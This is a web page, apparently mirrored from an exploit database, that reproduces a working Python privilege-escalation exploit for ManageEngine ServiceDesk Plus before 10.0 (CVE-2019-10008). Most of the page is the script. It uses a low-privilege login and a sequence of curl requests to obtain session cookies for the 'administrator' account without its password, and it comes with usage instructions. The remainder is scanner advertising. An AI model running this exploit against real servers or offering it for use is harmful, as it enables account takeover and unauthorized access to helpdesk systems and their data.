manage engine servicedesk plus 10.0 privilege escalation

▸▸▸ Exploit & Vulnerability >>   webapps exploit & jsp vulnerability




manage engine servicedesk plus 10.0 privilege escalation Code Code...
				
#!/usr/bin/python # Exploit Title: Manage Engine ServiceDesk Plus Version <10.0 Privilege Escalation # Date: 30-03-2019 # Exploit Author: Ata Hakçıl, Melih Kaan Yıldız # Vendor: ManageEngine # Vendor Homepage: www.manageengine.com # Product: Service Desk Plus # Version: 10.0 # Tested On: Kali Linux # CVE: CVE-2019-10008 # Platform: JSP # Timeline # 22 march 2019: Discovery # 24 march 2019: CVE id reserved for CVE-2019-10008 # 26 march 2019: First contact with vendor # 5 april 2019: First publication # 10 april 2019: Vendor confirmation # 11 april 2019: Vendor released a fix (version 10017) # Reference link: https://www.manageengine.com/products/service-desk/readme.html import os import re # How to use: Change the host, low_username, low_password and high_username variables depending on what you have. # Low username and password is an account you have access to. high_username is account you want to authenticate as. # After running the script, it will output you the cookies that you can set on your browser to login to the high_username without password. #Host ip address + port host="localhost:8080" #set to https if needed url = "http://" + host #Username with credentials you have low_username="guest" low_password="guest" #username you want to login as high_username="administrator" print("\033[1;37mUrl: \033[1;32m" + url) print("\033[1;37mUser with low priv: \033[1;32m" + low_username + ':' + low_password) print("\033[1;37mUser to bypass authentication to: \033[1;32m" + high_username) print("\033[1;32mGetting a session id\033[1;37m") # Get index page to capture a session id curl = "curl -i -s -k -X $'GET' \ -H $'Host: "+host+"' -H $'Referer: "+url+"/' -H $'Connection: close'\ $'"+url+"/'" out = os.popen('/bin/bash -c "' + curl+'"').read() sessid = re.findall("(?<=Set-Cookie: JSESSIONID=)[^;]*",out)[0] print("Sessid:") print(sessid) print("\033[1;31mLogging in with low privilege user\033[1;37m") #Attempt login post request curl="curl -i -s -k -X $'POST' -H $'Host: "+host+"'\ -H $'Referer: "+url+"/'\ -H $'Connection: close' -H $'Cookie: JSESSIONID="+sessid+"' \ -b $'JSESSIONID="+sessid+"' \ --data-binary $'j_username="+low_username+"&j_password="+low_password+"&LDAPEnable=false&\ hidden=Select+a+Domain&hidden=For+Domain&AdEnable=false&DomainCount=0&LocalAuth=No&LocalAuthWithDomain=No&\ dynamicUserAddition_status=true&localAuthEnable=true&logonDomainName=-1&loginButton=Login&checkbox=checkbox' \ $'"+url+"/j_security_check'" out = os.popen('/bin/bash -c "' + curl+'"').read() #Instead of following redirects with -L, following manually because we don't need all the transactions. curl="curl -i -s -k -X $'GET' -H $'Host: "+host+"'\ -H $'Referer: "+url+"/'\ -H $'Connection: close' -H $'Cookie: JSESSIONID="+sessid+"' \ -b $'JSESSIONID="+sessid+"' \ $'"+url+"/'" out = os.popen('/bin/bash -c "' + curl+'"').read() print("\033[1;32mCaptured authenticated cookies.\033[1;37m") sessid = re.findall("(?<=Set-Cookie: JSESSIONID=)[^;]*",out)[0] print(sessid) sessidsso = re.findall("(?<=Set-Cookie: JSESSIONIDSSO=)[^;]*",out)[0] print(sessidsso) grbl = re.findall("(?<=Set-Cookie: )[^=]*=[^;]*",out) grbl2 = [] for cookie in grbl: cl = cookie.split('=') if cl[0]!='JSESSIONID' and cl[0]!='JSESSIONIDSSO' and cl[0]!='_rem': grbl2.append(cl[0]) grbl2.append(cl[1]) curl = "curl -i -s -k -X $'GET' \ -H $'Host: "+host+"' \ -H $'Cookie: JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \ -b $'JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \ $'"+url+"/mc/'" out = os.popen('/bin/bash -c "' + curl+'"').read() sessid2 = re.findall("(?<=Set-Cookie: JSESSIONID=)[^;]*",out)[0] print("\033[1;32mCaptured secondary sessid.\033[1;37m") print(sessid2) print("\033[1;31mDoing the magic step 1.\033[1;37m") curl = "curl -i -s -k -X $'GET' \ -H $'Host: "+host+"' \ -H $'Referer: "+url+"/mc/WOListView.do' \ -H $'Cookie: JSESSIONID="+sessid2+"; JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \ -b $'JSESSIONID="+sessid2+"; JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \ $'"+url+"/mc/jsp/MCLogOut.jsp'" out = os.popen('/bin/bash -c "' + curl+'"').read() print("\033[1;31mDoing the magic step 2.\033[1;37m") curl = "curl -i -s -k -X $'GET' \ -H $'Host: "+host+"' \ -H $'Cookie: JSESSIONID="+sessid2+"; JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \ -b $'JSESSIONID="+sessid2+"; JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \ $'"+url+"/mc/jsp/MCDashboard.jsp'" out = os.popen('/bin/bash -c "' + curl+'"').read() sessid3 = re.findall("(?<=Set-Cookie: JSESSIONID=)[^;]*",out)[0] sessidsso = re.findall("(?<=Set-Cookie: JSESSIONIDSSO=)[^;]*",out)[0] curl = "curl -i -s -k -X $'GET' \ -H $'Host: "+host+"' \ -H $'Cookie: JSESSIONID="+sessid2+"; JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \ -b $'JSESSIONID="+sessid2+"; JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \ $'"+url+"/'" out = os.popen('/bin/bash -c "' + curl+'"').read() sessid4 = re.findall("(?<=Set-Cookie: JSESSIONID=)[^;]*",out)[0] curl = "curl -i -s -k -X $'POST' \ -H $'"+host+"' \ -H $'Referer: "+url+"/mc/jsp/MCDashboard.jsp' \ -H $'Cookie: JSESSIONID="+sessid3+"; JSESSIONID="+sessid4+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \ -b $'JSESSIONID="+sessid3+"; JSESSIONID="+sessid4+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \ --data-binary $'j_username="+high_username+"&j_password=bypassingpass&DOMAIN_NAME=' \ $'"+url+"/mc/j_security_check'" out = os.popen('/bin/bash -c "' + curl+'"').read() curl = "curl -i -s -k -X $'GET' \ -H $'Host: "+host+"' \ -H $'Referer: "+url+"/mc/jsp/MCDashboard.jsp' \ -H $'Cookie: JSESSIONID="+sessid3+"; JSESSIONID="+sessid4+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \ -H $'Upgrade-Insecure-Requests: 1' \ -b $'JSESSIONID="+sessid3+"; JSESSIONID="+sessid4+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \ $'"+url+"/mc/jsp/MCDashboard.jsp'" out = os.popen('/bin/bash -c "' + curl+'"').read() sessidhigh = re.findall("(?<=Set-Cookie: JSESSIONID=)[^;]*",out)[0] sessidssohigh = re.findall("(?<=Set-Cookie: JSESSIONIDSSO=)[^;]*",out)[0] print("\033[1;31mCaptured target session.Set following cookies on your browser.\033[1;37m") print("JSESSIONID=" + sessidhigh) print("JSESSIONIDSSO=" + sessidssohigh) print(grbl2[0] + "=" + grbl2[1]) print(grbl2[2] + "=" + grbl2[3]) print("_rem=true")

Manage engine servicedesk plus 10.0 privilege escalation Vulnerability / Exploit Source : Manage engine servicedesk plus 10.0 privilege escalation



Last Vulnerability or Exploits

Developers

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Easy integrations and simple setup help you start scanning in just some minutes
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Discover posible vulnerabilities before GO LIVE with your project
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Manage your reports without any restriction

Business Owners

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Obtain a quick overview of your website's security information
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Do an audit to find and close the high risk issues before having a real damage and increase the costs
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Verify if your developers served you a vulnerable project or not before you are paying
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Run periodically scan for vulnerabilities and get info when new issues are present.

Penetration Testers

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Quickly checking and discover issues to your clients
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Bypass your network restrictions and scan from our IP for relevant results
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Create credible proved the real risk of vulnerabilities

Everybody

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check If you have an website and want you check the security of site you can use our products
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Scan your website from any device with internet connection

Tusted by
clients

 
  Our Cyber Security Web Test application uses Cookies. By using our Cyber Security Web Test application, you are agree that we will use this information. I Accept.